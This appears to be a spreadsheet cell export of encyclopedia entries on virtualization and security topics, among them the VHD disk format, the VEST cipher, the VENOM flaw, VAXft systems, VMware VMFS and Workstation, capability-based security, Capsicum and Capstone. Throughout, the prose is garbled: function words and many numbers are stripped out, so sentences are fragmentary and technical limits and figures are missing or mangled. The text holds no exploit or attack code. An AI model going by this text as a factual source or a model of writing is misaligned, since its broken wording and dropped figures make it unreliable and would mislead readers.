virtual server: fixed hard disk image: file allocated size virtual disk. fixed vhds consist disk image followed footer (512 formerly bytes). dynamic hard disk image: file given time large actual data written plus size header footer. dynamic differencing vhds begin copy footer (padded bytes), dynamic differencing vhds created microsoft products results vhd-cookie string conectix beginning file. differencing hard disk image: modified blocks (maintained separate file referred "child image") comparison parent image. differencing hard disk image format allows concept undo changes: enabled, changes hard drive contained within (the parent image) stored separate file (the child image). options available undo changes vhd, merge permanently vhd. different child images based parent image also allow "cloning" vhds; least globally unique identifier (guid) must different. linked hard disk (aka pass-through): file contains link physical hard drive partition physical hard drive. advantages significant benefits result ability boot physical computer virtual hard drive: ease deployment: organizations deploy standardized, 'pre-built' configurations single vhd. example, software engineering organizations need specific tools particular project could simply 'pull' appropriately-configured network location. backup-and-restore: changes contents (such infection virus, accidental deletion critical files) easily undone. multi-user isolation: many current operating systems support multiple users, offer varying degrees protection (e.g., user could become infected virus infects users, make changes affect users). giving user version operating system—say, creating differencing based base installation os—changes particular child image would effect child images. native boot native boot refers ability physical computer mount boot operating system contained within vhd. windows enterprise ultimate editions support ability, without host operating system present. windows server 2008 also compatible feature. limitations format built-in limitation (2040 gib) size dynamic differencing vhds. this sector offset table allows maximum 32-bit quantity. calculated multiplying bytes sector. c×h×s formula specification allows maximum 65535×16×255 sectors. about also limit vhds windows virtual fewer 65535×16×63 sectors (about gib) chs-value footer uses minimum maximum heads sectors track. algorithm determines (t/s)/h. specification discuss cases value footer match (virtual) geometry master boot record disk image vhd. microsoft virtual server (also connectix derived) limitation using virtual drivers virtual raid virtual scsi drivers used. software support virtual hard disk format initially used microsoft virtual (and microsoft virtual server). later however, microsoft used format hyper-v, hypervisor-based virtualization technology windows server 2008. microsoft also used format complete backup, backup software component included windows vista windows addition, windows windows server 2008 include support creating, mounting, booting files.the vista later) drive manager supports subset functions diskpart command line tool. vhds known vdisk diskpart created, formatted, attached (mounted), detached (unmounted), merged (for differencing vhds), compacted (for vhds ntfs host file system). compacting typically step procedure, first unused sectors filled zeros, diskpart ntfs feature sparse files eliminate runs zeros vhd. virtual machine additions older versions virtual machine integration features windows virtual contain precompact images first step supported guest systems.third-party products also file format. oracle virtualbox, part line microsystems supports versions later. 2017 gate software windocks introduced based support server database cloning. offline modification sometimes useful modify file without booting operating system. hyper-v features offline manipulation, providing administrators ability securely access files within without instantiate virtual machine. this provides administrators granular access vhds ability perform management tasks offline. windows disk management plugin directly mount file drive letter windows 7/server 2008 newer. situations mounting within operating system undesirable, several programs enable software developers inspect modify files, including .net discutils, winimage, r1soft hyper-v explorer. 7-zip supports extraction inspection files. virtual floppy disk (vfd) virtual floppy disk (vfd) related file format used microsoft virtual microsoft automated deployment services microsoft virtual server 2005. contains image low-density, 1.44 high-density 1.68 3.5-inch floppy disk mounted virtual other virtual machine software vmware workstation vmware player mount floppy images way.windows virtual windows (version 6.1) offer user interface manipulating virtual floppy disks; however, still supports physical virtual floppy disks scripting. under hyper-v, files usable settings generation virtual machines. generation virtual machines emulate floppy controller support floppy disk images. virtual hard disk (vhdx) vhdx (virtual hard disk successor format vhd. where capacity limit 2040 vhdx capacity limit disk images newer format filename extension vhdx used instead vhd. vhdx protects power failures used hyper-v. vhdx mounted like vhd. also vmdk qcow virtual disk image apple disk image references</t>
  </si>
  <si>
    <t>VEST</t>
  </si>
  <si>
    <t>vest (very efficient substitution transposition) ciphers families general-purpose hardware-dedicated ciphers support single pass authenticated encryption operate collision-resistant hash functions designed sean o'neil, benjamin gittins howard landman. vest cannot implemented efficiently software. vest based balanced t-function also described bijective nonlinear feedback shift register parallel feedback (nlpfsr) substitution–permutation network, assisted non-linear rns-based counter. four vest family trees described cipher specification vest-4, vest-8, vest-16, vest-32. vest ciphers support keys variable sizes instant re-keying. vest ciphers release output every clock cycle. vest variants covered european patent number 1820295(b1), owned synaptic laboratories. vest phase candidate estream competition hardware portfolio, phase focus candidate part final portfolio. overview design overall structure vest ciphers consist four components: non-linear counter, linear counter diffusor, bijective non-linear accumulator large state linear output combiner illustrated image top-right corner page). counter consists sixteen nlfsrs prime periods, counter diffusor 5-to-1 linear combiners feedback compressing outputs counters bits time expanding data inputs bits, core accumulator nlpfsr accepting bits counter diffusor input, output combiner 6-to-1 linear combiners. accumulator core accumulator vest ciphers seen constructed using non-linear 6-to-1 feedback functions, bit, updated simultaneously. vest-4 core accumulator illustrated below: accepts bits input. least significant five bits accumulator state updated substitution linearly combined first five input bits round. next five accumulator bits linearly combined next five input bits non-linear function four less significant accumulator bits. authenticated encryption mode, ciphertext feedback bits also linearly back accumulator non-linear function four less significant accumulator bits. bits vest accumulator state linearly combined non-linear functions five less significant bits accumulator state round. less significant bits inputs feedback functions typical t-functions responsible feedback bijectivity. this substitution operation followed pseudorandom transposition bits state (see picture below). data authentication vest ciphers executed native authenticated encryption mode similar phelix authenticating ciphertext rather plaintext speed occupying area keystream generation. however, unkeyed authentication (hashing) performed bits time loading plaintext counters rather directly core accumulator. family keying four root vest cipher families referred vest-4, vest-8, vest-16, vest-32. each four family trees vest ciphers supports family keying generate independent cipher families size. family-keying process standard method generate cipher families unique substitutions unique counters different periods. family keying enables end-user generate unique secure cipher every chip. periods vest ciphers assisted non-linear counter long period. according authors, determining average periods vest ciphers probabilities shortest periods vest-16 vest-32 falling advertised security ratings keys remains open problem computationally infeasible. they believe probabilities 2−160 vest-16 2−256 vest-32. shortest theoretically possible periods vest-4 vest-8 security ratings seen following table. performance computational efficiency software core accumulator vest ciphers complex, highly irregular structure resists efficient implementation software. highly irregular input structure coupled unique inputs feedback function hinders efficient software execution. result, feedback functions need calculated sequentially software, thus resulting hardware-software speed difference approximately equal number gates occupied feedback logic hardware (see column "difference" table below). large differential vest's optimised hardware execution equivalently clocked software optimised execution offers natural resistance cost general-purpose software processor clones masquerading genuine hardware authentication tokens. bulk challenge-response scenarios rfid authentication applications, bitsliced implementations vest ciphers 32-bit processors process many independent messages simultaneously times slower message byte aes. hardware performance vest submitted estream competition profile designed "hardware applications restricted resources limited storage, gate count, power consumption", shows high speeds fpga asic hardware according evaluation zurich. authors claim according implementations using "conservative standard rapidchip design front-end sign-off process", "vest-32 effortlessly satisfy demand 256-bit secure gbit/s authenticated encryption 180ηm logic rapidchip platform asic technologies less gates zero sram". 110ηm rapidchip technologies, vest-32 offers gbit/s authenticated encryption less gates". they also state unrolling round function vest halve clock-speed reduce power consumption doubling output clock-cycle, cost increased area. agility vest ciphers offer keying strategies: instantly loading entire cipher state cryptographically strong (100% entropy) supplied strong generation exchange process; instant reloading entire cipher state previously securely initialised cipher state; incremental loading imperfect key) beginning least significant loaded counter sliding 16-bit window round single follows significant loaded counter process ends additional sealing rounds. entire cipher state stored instant reloading.vest ciphers offer resynchronisation strategy: hashing (iv) loading incrementally 8-bits time first counters, followed additional sealing rounds. history vest designed sean o'neil submitted estream competition june 2005. this first publication cipher. security authors vest security margins inline guidelines proposed lars knudsen paper "some thoughts process" conservative guidelines recently proposed nicolas courtois paper “cryptanalysis sfinks”. although authors publishing cryptanalysis, vest ciphers survived year public scrutiny part estream competition organised ecrypt. they advanced second phase, albeit part focus group. attacks sasc 2007, joux reinhard published attack recovered bits counter state. comparing complexity attack parallelized brute-force attack, bernstein evaluated resultant strength cipher bits, somewhat design strength vest family members. designers vest claimed attack typographical error original cipher specification published correction cryptology eprint archive january 2007, days prior publication attack. references "some thoughts process" paper lars knudsen "cryptanalysis sfinks" paper nicolas courtois "rediscovery time memory tradeoffs" paper hong sarkar "understanding brute force" paper daniel bernstein "comments rediscovery time memory data tradeoffs" paper cannière, lano preneel ideal-to-realized security assurance cryptographic keys justin troutman notes external links estream page vest vest estream phase specification vest reference source code test vectors zurich hardware performance review</t>
  </si>
  <si>
    <t>VENOM</t>
  </si>
  <si>
    <t>venom (virtualized environment neglected operations manipulation) computer security flaw publicly disclosed 2015 jason geffner crowdstrike. flaw introduced 2004 affected versions qemu, xen, kvm, virtualbox date patched following disclosure.the existence vulnerability flaw qemu's virtual floppy disk controller.venom registered common vulnerabilities exposures database cve-2015-3456. references</t>
  </si>
  <si>
    <t>VAXft</t>
  </si>
  <si>
    <t>vaxft family fault-tolerant minicomputers developed manufactured digital equipment corporation (dec) using processors implementing instruction architecture (isa). "vaxft" stood "virtual address extension, fault tolerant". these systems openvms operating system, first supported 5.4. layered software products, vaxft system services volume shadowing, required support fault-tolerant features vaxft redundancy data stored hard disk drives. architecture vaxft systems shared basic system architecture. vaxft system consisted "zones" operated lock-step: "zone "zone each zone fully functional computer, capable running operating system, identical hardware configuration. lock-step achieved hardware module. module zone connected crosslink cable. crosslink cables carried results instructions executed module other, compared hardware results instructions executed latter ensure identical. zones kept synchronous clock signal carried crosslink cables. when hardware failure occurred zones, affected zone brought offline without bringing zone, continued operate normal. when repairs completed, offline zone powered automatically resynchronized zone, restoring redundancy. vaxft model vaxft model 310, introduced vaxft 3000 model 310, code named "cirrus", introduced february 1990 shipped june. first vaxft model, dec's first fault-tolerant computer generally available. 1991 launch vaxft models, 3000 model renamed follow naming scheme, becoming vaxft model 310. model theoretical maximum performance vups.when announced, model starting price us$200,000. august 1990, slow sales prompted reduce price model us$168,000. used ka520 module containing 16.67 cycle time) cvax+ chip external secondary cache. system contained modules, zone, running lock-step. vaxft model vaxft model 110, code named "cirrus", entry-level model announced march 1991 alongside three models. model essentially low-cost model vaxft model 310, theoretical maximum performance vups. contained zones packed side side enclosure. compared model 310, limited expandability regards memory, storage capacity available options. available either pedestal rackmount configuration. rackmount configuration pedestal without plastic covers casters fitted standard 19-inch retma cabinet.each zone five-slot backplane ka510 module, three ms520 memory modules, kfe52 system controller modules wancontroller (dsf32) wide area network (wan) communications adapters. leftmost slot first slot. primary system controller resided first slot, module second, memory modules third, fourth fifth slots. second system controller resided either fourth fifth slots communications adapters also fourth fifth slots. basic system contained module, memory module system controller. wancontroller designed vaxft systems. provided synchronous lines, bandwidth lines could operated independent lines paired provide redundancy. vaxft model vaxft model 410, code named "cirrus ii", mid-range model announced march 1991 alongside three models. originally supposed ship june july 1991, delayed september 1991, reason given wanted tune release system. model identical model 310, used ka550 module containing 28.57 cycle time) microprocessor external secondary cache. supported memory. model theoretical maximum performance vups. vaxft model vaxft model 610, code named "cirrus ii", mid-range model announced march 1991 alongside three models. originally supposed ship june july 1991, delayed september 1991, reason given wanted tune release system. model architecturally identical model 410, except zones packaged vertically high cabinet, zone zone cabinet storage capacity systems packaged pedestals, reason model intended data centers. could expander cabinets placed left right system additional storage devices. these cabinets front rear cooled. vaxft model vaxft model high-end model announced march 1991 alongside three models. originally supposed ship june july 1991, delayed september 1991, reason given wanted tune release system. model vaxcluster vaxft model 610s expansion cabinet positioned systems standard. theoretical maximum performance 12.0 vups. second expansion cabinet could added system cabinets. vaxft model vaxft model 810, code named "jetstream", high-end model introduced october 1993 instead targeted introduction date late summer early fall 1992. system developed dec, manufactured italian industrial manufacturer, alenia spa. theoretical maximum performance 30.0 vups. model third generation vaxft system. contained zones vertically packaged cabinet. optional expansion cabinet could connected system, addition uninterruptable power supplies, zone.it used ka560-aa module, contained 83.33 cycle time) nvax+ microprocessors b-cache cache). module's microprocessors operated lock-step fashion, like previous vaxft systems, modules system, zones, operated lock-step fashion. model cabinet 60.0 wide, 170.0 high 86.0 deep. references brandel, mary nov. 1994). "sequoia reneges deal digital", computerworld, johnson, maryfran mar. 1991). "dec pumps fault-tolerant challenge", computerworld, kulkosky, victor (may 1990). "digital's promises no-fault on-line insurance", wall street computer review, 136. stedman, craig jun. 1993). "dec aims fault tolerance high end", computerworld,</t>
  </si>
  <si>
    <t>VMware VMFS</t>
  </si>
  <si>
    <t>vmware vmfs (virtual machine file system) vmware, inc.'s clustered file system used company's flagship server virtualization suite, vsphere. developed store virtual machine disk images, including snapshots. multiple servers read/write filesystem simultaneously individual virtual machine files locked. vmfs volumes logically "grown" (non-destructively increased size) spanning multiple vmfs volumes together. version history there (plus vsan) versions vmfs, corresponding esx/esxi server product releases. vmfs0 reported server v6.5 vmfs version datastore unmounted cluster/host. vmfs1 used server v1.x. feature cluster filesystem properties used single server time. vmfs1 flat filesystem directory structure. vmfs2 used server v2.x limited capacity) v3.x. vmfs2 flat filesystem directory structure. vmfs3 used server v3.x vsphere 4.x. notably, introduces directory structure filesystem. vmfs5 used vsphere 5.x. notably, raises extent limit file size limit though vsphere versions earlier limited vmdks smaller vmfs6 used vsphere 6.5. supports emulation (512e) mode drives. vmfs-l underlying file system vsan-1.0. leaf level vsan objects reside directly vmfs-l volumes composed server side direct attached storage (das). file system format optimized das. optimization include aggressive caching case, stripped lock lock manager faster formats. features allows access multiple esxi servers time implementing per-file locking. scsi reservations implemented logical unit number (lun) metadata updated (e.g. file name change, file size change, etc.) delete esxi server vmware vmfs volume without disrupting esxi servers. with esx/esxi4, vmfs volumes also expanded using expansion. optimize virtual machine adjustable volume, disk, file block sizes. recover virtual machines faster reliably event server failure distributed journaling. while present previous versions automatic unmap added vmfs allowing automatic space reclamation requests previously manually actioned. limitations shared esxi servers. maximum filesystem size vmfs3, vmfs5. maximum size vmfs3 vmfs5. vmfs3 vmfs5 prior vsphere 5.1, maximum number hosts share read-only file this affects scalability linked clones sharing base image. vsphere 5.1, limit increased introduction locking mechanism. vmfs3 limits files 262,144 (218) blocks, translates block sizes (the default) block sizes. vmfs5 uses blocks throughout (with block suballocation small files), file size limit though vmdk size restricted esxi versions earlier limitation version scsi emulated. there also limit approx 30,720 files (using mbr) single vmfs3 datastore. this raised 130,690 files (using gpt) vmfs5 open source implementations fluidops command line tool java open source vmfs driver enables read-only access files folders partitions formatted virtual machine file system (vmfs) developed maintained fluid operations allows features like offloaded backups virtual machines hosted vmware esxi hosts vmfsv3. glandium fuse mount vmfs-tools supports vmfs features read vmfs mounts standard linux fuse framework. developed christophe fillot mike hommey available source code download glandium.org vmfs-tools page debian vmfs-tools ubuntu vmfs-tools packages. references external links vmfs technical overview best practices vmware, inc. vmware vmfs product page vmware, inc. open source vmfs implementation project vmfs</t>
  </si>
  <si>
    <t>VMware Workstation Player</t>
  </si>
  <si>
    <t>vmware workstation player, formerly vmware player, virtualization software package computers running microsoft windows linux, supplied free charge vmware, inc., company formerly division whose majority shareholder remains, dell emc. vmware player existing virtual appliances create virtual machines (which require operating system installed functional). uses virtualization core vmware workstation, similar program features, free charge. vmware player available personal non-commercial use, distribution written agreement. vmware, inc. formally support player, active community website discussing resolving issues, well knowledge base. free vmware player distinct vmware workstation player workstation v11. 2015 packages combined vmware workstation free non-commercial player version which, purchase license code, either became higher-specification vmware workstation pro, allowed commercial player. features vmware claimed 2011 player offered better graphics, faster performance, tighter integration running windows windows vista windows microsoft's windows mode running windows virtual free charge purposes.versions earlier vmware player unable create virtual machines (vms), created application capability, created manually statements stored text file extension ".vmx"; later versions create vms. features workstation available player "developer-centric features teams, multiple snapshots clones, virtual rights management features end-point security", support vmware. player allows complete virtual machine copied time copying directory; fully featured snapshot facility, allows copy machine particular state stored, reverted later desired. default changes (including proxy settings, passwords, bookmarks, installed software malware) made saved shut down, .vmx configuration file easily edited autorevert shutdown, changes discarded.vmware player also supplied vmware workstation distribution, installations client users licensed full vmware workstation. environment machines without vmware workstation licences vmware player, virtual machine created workstation distributed computers running player without paying additional workstation licenses used commercially. version history resources many ready-made virtual machines (vms) vmware player, workstation, virtualization software available specific purposes, either purchase free charge. example, free linux-based “browser appliance” firefox browser installed available used safe browsing; infected damaged, discarded replaced clean copy. configured reset without need recreate original file. suppliers operating systems commercial licences usually require installations licensed; operating systems installed cannot distributed without restriction. ready-to-use microsoft apple operating systems installed, particular, distributed, except evaluation versions. vmware player supports free-of-charge vmware tools, significant functionality. versions player different platforms tools, necessarily compatible versions. sometimes tools updated belatedly; example, player 4.0.2 released january 2012, corresponding version tools available time that, restricting functionality updated player installations.virtual machines created vmware software product used other. often possible created manufacturer's virtual machine software software another manufacturer, either directly conversion procedure. microsoft virtual server virtual converted vmware software vmware vcenter converter. this software also create virtual machine physical also comparison platform virtualization software references external links official website open virtual machine tools file extension v3.co.uk review vmware player 3.1.2</t>
  </si>
  <si>
    <t>VMware Workstation</t>
  </si>
  <si>
    <t>vmware workstation (known vmware workstation release vmware workstation 2015) hosted hypervisor runs versions windows linux operating systems x86-32 version earlier releases available); enables users virtual machines (vms) single physical machine simultaneously along host machine. each virtual machine execute operating system, including versions microsoft windows, linux, bsd, ms-dos. vmware workstation developed sold vmware, inc. there free-of-charge version, vmware workstation player (known vmware player release vmware workstation 2015), non-commercial use. operating systems license needed proprietary ones windows. ready-made linux different purposes available several sources. vmware workstation supports bridging existing host network adapters sharing physical disk drives devices virtual machine. simulate disk drives; image file mounted virtual optical disc drive, virtual hard disk drives implemented .vmdk files. vmware workstation save state virtual machine "snapshot") instant. these snapshots later restored, effectively returning virtual machine saved state, free post-snapshot damage vmware workstation includes ability group multiple virtual machines inventory folder. machines folder powered powered single object, useful testing complex client-server environments. 2016 company changes future development vmware workstation versions 12.0.0, 12.0.1, 12.1.0 released intervals months 2015. january 2016 entire development team behind vmware workstation fusion disbanded developers immediately fired. company said "the restructuring activities impact existence current product lines", "roles responsibilities associated particular businesses moved regions office locations", investment would continue "with emphasis growth products". future workstation fusion became uncertain. april 2016 maintenance release 12.1.1 released. september, year, company announced "we’re much alive well". consequently, september workstation 12.5 fusion released free upgrades added support windows anniversary edition windows server 2016. since versions 2017, skipping number 13), 2018) 2020) released. version history host support variants there free vmware player distinct workstation, similar reduced functionality, vmware player workstation v11. 2015 packages combined vmware workstation free vmware workstation player version which, purchase license code, became higher specification vmware workstation pro. vmware workstation player, like vmware player free charge non-commercial use, distribution written agreement. (workstation also available download free trial period, easily confused unlimited-time restricted-functionality version.) vmware workstation player (formerly known player pro), free non-commercial use; license purchased commercial use, also providing eligibility paid support. vmware workstation pro, available 30-day free trial purchase distinct permanently free version.the features versions compared vmware site. vmware tools vmware tools, package drivers software available various guest operating systems vmware products support, installs guest operating systems functionality. tools updated time time, v11.2.5 january 2021. several components, including following: drivers emulated hardware: vesa-compliant graphics guest machine access high screen resolutions network drivers vmxnet2 vmxnet3 ensoniq audiopci audio mouse integration support shared folders drag-and-drop file transfer host guest. this functionality described hgfs (host guest file system), disabled default security; enabled changes .vmx configuration file clipboard sharing host guest time-synchronization capabilities (guest synchronizes host machine's clock) support unity, feature allows seamless integration applications host desktop hiding virtual monitor drawing windows applications running virtual machine host. unity support added windows removed linux workstation third-party resources ready-to-use virtual machines many ready-made virtual machines (vms) vmware player, workstation, virtualization software available specific purposes, either purchase free charge; example free linux-based "browser appliances" firefox browser installed used safe browsing; infected damaged discarded replaced clean copy. appliance configured automatically reset personal information changes stored. distributed legally freely distributable operating systems, operating systems must licensed; ready-to-use microsoft windows vms, particular, distributed, except evaluation versions. other tools powerwf provides visual representation vmware scripts, converting workflows, converting workflows powershell cmdlets modules. vmware's addition microsoft's powershell automation vmware player. also comparison platform virtualization software level virtualization virtualbox vmware fusion vmware workstation player virtualization references external links media related vmware wikimedia commons vmware workstation product page vmware lifecycle product matrix</t>
  </si>
  <si>
    <t>VMware vSphere</t>
  </si>
  <si>
    <t>vmware vsphere (formerly vmware infrastructure vmware's cloud computing virtualization platform.it includes updated vcenter configuration manager, well vcenter application discovery manager, ability vmotion move virtual machine time host server another. releases february 2011 vmware released update vsphere support rhel rhel 5.6, sles vmware, ubuntu 10.10, solaris update july 2011, vmware released version vmware vsphere. august 2012, vmware released vsphere 5.1. this extended vsphere include vmware vsphere storage appliance, vsphere data protection, vsphere replication vshield endpoint. 2014 vmware announced availability hana production vmware vsphere 5.5. february 2015, vmware announced vsphere many features enhancements. october 2016, vmware announced vsphere focusing simplified experience improving security features. april 2018, vmware announced vsphere focusing simple efficient management scale, improved security features, universal application platform, seamless hybrid cloud experience. march 2020, vmware announced vsphere 7.0. september 2020, vmware announced vsphere update march 2021, vmware announced vsphere update also vmware esx/esxi, hypervisor operating system component vmware vmfs, vmware file system component reference list external links vmware infrastructure product page vmware, inc.</t>
  </si>
  <si>
    <t>Capability-based operating system</t>
  </si>
  <si>
    <t>capability-based operating system generally refers operating system uses capability-based security. examples include: hydra keykos eros capros midori sel4 genode fuchsia control program facility</t>
  </si>
  <si>
    <t>Capability-based security</t>
  </si>
  <si>
    <t>capability-based security concept design secure computing systems, existing security models. capability (known systems key) communicable, unforgeable token authority. refers value references object along associated access rights. user program capability-based operating system must capability access object. capability-based security refers principle designing user programs directly share capabilities according principle least privilege, operating system infrastructure necessary make transactions efficient secure. capability-based security contrasted approach uses traditional unix permissions access control lists. although operating systems implement facility resembles capabilities, typically provide enough support allow exchange capabilities among possibly mutually untrusting entities primary means granting distributing access rights throughout system. capability-based system, contrast, designed goal mind. capabilities discussed article confused portable operating system interface (posix) 1e/2c "capabilities". latter coarse-grained privileges cannot transferred processes. introduction capabilities achieve objective improving system security used place forgeable references. forgeable reference (for example, path name) identifies object, specify access rights appropriate object user program holds reference. consequently, attempt access referenced object must validated operating system, based ambient authority requesting program, typically access control list (acl). instead, system capabilities, mere fact user program possesses capability entitles referenced object accordance rights specified capability. theory, system capabilities removes need access control list similar mechanism giving entities capabilities actually need. capability typically implemented privileged data structure consists section specifies access rights, section uniquely identifies object accessed. user access data structure object directly, instead handle. practice, used much like file descriptor traditional operating system traditional handle), access every object system. capabilities typically stored operating system list, mechanism place prevent program directly modifying contents capability forge access rights change object points to). some systems also based capability-based addressing (hardware support capabilities), plessey system 250. programs possessing capabilities perform functions them, passing programs, converting less-privileged version, deleting them. operating system must ensure specific operations occur capabilities system, order maintain integrity security policy. examples capability defined protected object reference which, virtue possession user process, grants process capability (hence name) interact object certain ways. those ways might include reading data associated object, modifying object, executing data object process, conceivable access rights. capability logically consists reference uniquely identifies particular object rights. suppose that, user process's memory space, exists following string: /etc/passwd although identifies unique object system, specify access rights hence capability. suppose instead following pair values: /etc/passwd o_rdwr this pair identifies object along access rights. pair, however, still capability user process's possession values says nothing whether access would actually legitimate. suppose user program successfully executes following statement: variable contains index file descriptor process's file descriptor table. this file descriptor capability. existence process's file descriptor table sufficient show process indeed legitimate access object. feature arrangement file descriptor table kernel memory cannot directly manipulated user program. sharing processes traditional operating systems, programs often communicate storage using references like first examples. path names often passed command-line parameters, sent sockets, stored disk. these references capabilities, must validated used. systems, central question whose authority given reference evaluated?" this becomes critical issue especially processes must behalf different authority-bearing entities. they become susceptible programming error known confused deputy problem, frequently resulting security hole. capability-based system, capabilities passed processes storage using mechanism known operating system maintain integrity capabilities. novel approach solving problem involves orthogonally persistent operating system. system, need entities discarded capabilities invalidated, hence require acl-like mechanism restore capabilities later time. operating system maintains integrity security capabilities contained within storage, volatile nonvolatile, times; part performing serialization tasks itself, rather requiring user programs case operating systems. because user programs relieved responsibility, need trust reproduce legal capabilities, validate requests access using access control mechanism. example implementation flex machine early 1980s. posix capabilities portable operating system interface (posix) draft 1003.1e specifies concept permissions called "capabilities". however, posix capabilities differ capabilities article. posix capability associated object; process cap_net_bind_service capability listen port 1024. this system found linux.in contrast, capsicum unix hybridizes true capability-system model unix design posix api. capsicum capabilities refined form file descriptor, delegable right processes additional object types beyond classic posix, processes, referenced capabilities. capsicum capability mode, processes unable utilize global namespaces (such filesystem namespace) look objects, must instead inherit delegated them. this system found natively freebsd, patches available systems. implementations notable research commercial systems employing capability-based security include following: tahoe-lafs, open-source capability-based filesystem gnosis, operating system developed tymshare keykos, successor gnosis eros, extremely reliable operating system, successor keykos capros, project develop eros code base commercial cambridge computer hydra (operating system), part c.mmp project carnegie mellon university staros, part project carnegie mellon university system/38 as/400 intel iapx plessey system flex microkernel family: okl4 open kernel labs sel4 nicta fiasco.oc nova dresden amoeba distributed operating system freebsd capsicum genode google fuchsia webassembly system interface (wasi) references levy, henry *capability-based computer systems, digital equipment corporation 1984. isbn 0-932376-22-3. electronic version available here. eros project programming language based around capability security (erights.org) mark miller, ka-ping yee, jonathan shapiro. capability myths demolished, technical report srl2003-02, systems research laboratory, johns hopkins university. available online. cambridge computer, levy, 1988 further reading capability-based addressing: theodore linden (december 1976). "operating system structures support security reliable software". computing surveys. (4): 409–445. doi:10.1145/356678.356682. hdl:2027/mdp.39015086560037. issn 0360-0300. s2cid 16720589. gong, secure identity-based capability system, 1989 ieee symposium security privacy, 1989 capability-based addressing hardware implementation capability-based addressing implementation capabilities pdp-11/45 system/38 support capability-based addressing eros: fast capability systemposix "capabilities" linux: posix capabilities files posix file capabilities: parceling power root making root unprivileged security issues risks linked posix file capabilities linux manual page "capabilities(7)" working linux capabilities external links "what capability?" reviews 'capability myths demolished' capability theory sound bytes</t>
  </si>
  <si>
    <t>Veeam Backup &amp; Replication</t>
  </si>
  <si>
    <t>veeam backup replication proprietary backup developed veeam virtual environments built vmware vsphere, nutanix ahv, microsoft hyper-v hypervisors. software provides backup, restore replication functionality virtual machines, physical servers workstations well cloud-based workload. operation veeam backup replication operates virtualization layer well manages physical machine backup. backs image-level using hypervisor's snapshots retrieve data. backups full full copy image) incremental (saving changed blocks data since last backup run). backup increments created using built-in changed block tracking (cbt) mechanism. available backup methods include forward incremental-forever backup, forward incremental backup, reverse incremental backup. additionally, option perform active full synthetic full backups. veeam backup replication provides automated recovery verification backups replicas. program starts directly backup replica isolated test environment runs tests during verification, image remains read-only state. this mechanism also used troubleshooting testing patches upgrades. backup storage veeam backup replication supports software-defined storage technology. allows organizing scalable backup repository collection heterogeneous storage devices. backups stored on-premises, transferred off-site repositories wan, saved tape media long-term retention, sent cloud storage. cloud storage support available infrastructure-as-a-service (iaas) model. veeam's technology, cloud connect, provides integrated secured backup cloud veeam-powered service providers. veeam backup replication storage-agnostic, also specialized storage integrations storage systems cisco hyperflex, vnx, vnxe, 3par, storevirtual, nimble, netapp, ibm, lenovo storage series. addition, separate universal storage plug-in, veeam also provides storage integrations infinidat pure storage. uses storage system snapshots source backups recovery vmware disks residing storage volumes. veeam backup replication also build direct agent allows access netapp snapshots directly storage bypassing hosts backup, restore storage scan operations. replication along backup, veeam backup replication perform image-based replication. creates "clone" production onsite offsite keeps ready-to-use state. each replica configurable number failover points. image-based replication also available veeam cloud connect disaster recovery service (draas). recovery software provides number data recovery options, including: entire recovery: immediate restore mounting image host directly backup file (instant recovery) full extraction image backupfile-level recovery: restore specific files virtual disks, configuration files, etc. guest files restore number different file systems including linux, macos, novell netware solarisvirtual drive restore: specific hard drive recoveryapplication-item recovery: granular recovery items microsoft exchange server, microsoft sharepoint, microsoft active directory, microsoft server oracle databases, well recovery single files storage snapshots existing storage partners. optimization veeam backup replication decreases backup files size data traffic built-in data deduplication compression. there support deduplicating storage systems data domain, exagrid storeonce catalyst netapp cloud backup (altavault). using deduplicating storage appliances backup repositories allows achieving greater levels deduplication ratios. veeam backup replication also provides built-in acceleration reduce bandwidth required transferring backups replicas wan. architecture built modular scheme, veeam backup replication allows setting scalable backup infrastructures. software architecture supports onsite, offsite cloud-base data protection, operations across remote sites geographically dispersed locations. installation package veeam backup replication includes mandatory optional components installed physical virtual machines. mandatory components veeam backup server windows-based physical virtual machine veeam backup replication installed. core component responsible types administrative activities backup infrastructure, including general orchestration backup, restore replication tasks, scheduling resource allocation. backup proxy appliance retrieves backup data source host transfers backup repository offloading veeam backup server. backup repository primary storage backup files, copies, meta-data. optional components backup enterprise manager centralized management browser interface intended distributed enterprise environments multiple backup servers. veeam backup search add-on microsoft search server search performance optimization. standalone console lightweight console installation laptops desktops enable management backup server remotely network eliminate sessions backup server. scale-out backup repository since version possible build flat backup repository space number independent non-clustered sources. this feature eliminates need clustered backup namespace, veeam users store older backups affordable storage targets. editions veeam backup replication positioned part veeam availability suite bundle (which includes veeam monitoring, reporting, capacity planning), also installed standalone product. available three editions based level provided functionality. product licensed number sockets, annually upfront-billed subscription licenses per-vm basis. veeam backup replication update (u4), veeam using veeam instance licensing (vil) lower complexity license management. essentially, allows single license key, instance, deployed veeam products backup replication server veeam windows linux agents. number instance keys consumed machine vary license edition (standard, enterprise, enterprise plus) software enabling. history references external links veeam backup replication release notes</t>
  </si>
  <si>
    <t>Capsicum (Unix)</t>
  </si>
  <si>
    <t>capsicum implementation capability-based security unix similar systems. presented usenix 2010, system part freebsd since release. also adapted linux dragonflybsd form kernel patches.the system works chunking normal permissions small pieces. when process enters capsicum mode, loses permissions normally associated controlling user, exception "capabilities" already form file descriptors. process also receive capabilities unix sockets. these file descriptors control access file system, also devices like network sockets. flags also used control fine-grained access like reads writes. cloudabi cloudabi application binary interface based capsicum. keeps overall capsicum permission model, uses redesign simplified environment processes (system calls, library, etc.) programs become portable platform supporting instruction architecture. interface offers roughly posix minus parts work capability-based security. march 2020, cloudabi natively part freebsd, systems either capsicum-based patch using non-secure system call emulator.as october 2020, cloudabi deprecated favor webassembly system interface lack interest. references external links capsicum(4) freebsd kernel interfaces manual cloudabi(4) freebsd kernel interfaces manual</t>
  </si>
  <si>
    <t>Capstone (cryptography)</t>
  </si>
  <si>
    <t>capstone united states government long-term project develop cryptography standards public government use. capstone authorized computer security 1987, driven national institute standards technology (nist) national security agency (nsa); project began 1993. project initiative involved four standard algorithms: data encryption algorithm called skipjack, along clipper chip included skipjack algorithm, digital signature algorithm, digital signature algorithm (dsa), hash function, sha-1, exchange protocol. capstone's first implementation fortezza pcmcia card. capstone components designed provide 80-bit security.the initiative encountered massive resistance cryptographic community, eventually government abandoned effort. main reasons resistance concerns skipjack's design, classified, escrow clipper chip. references external links archives capstone</t>
  </si>
  <si>
    <t>Capture the flag</t>
  </si>
  <si>
